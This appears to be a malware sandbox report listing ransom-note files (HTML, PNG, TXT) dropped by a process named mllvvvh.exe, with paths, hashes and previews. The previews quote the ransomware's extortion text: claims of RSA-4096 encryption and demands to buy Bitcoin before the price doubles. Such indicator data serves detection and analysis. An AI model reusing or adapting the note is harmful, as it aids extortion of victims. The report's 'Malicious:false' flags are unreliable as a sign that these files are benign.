                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
